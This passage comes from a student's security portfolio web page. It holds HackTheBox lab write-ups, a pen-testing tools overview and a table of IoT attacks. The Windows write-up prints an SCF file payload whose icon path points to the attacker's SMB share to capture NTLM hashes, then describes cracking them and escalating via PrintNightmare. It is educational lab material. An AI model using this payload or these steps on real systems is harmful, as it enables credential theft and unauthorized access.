          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
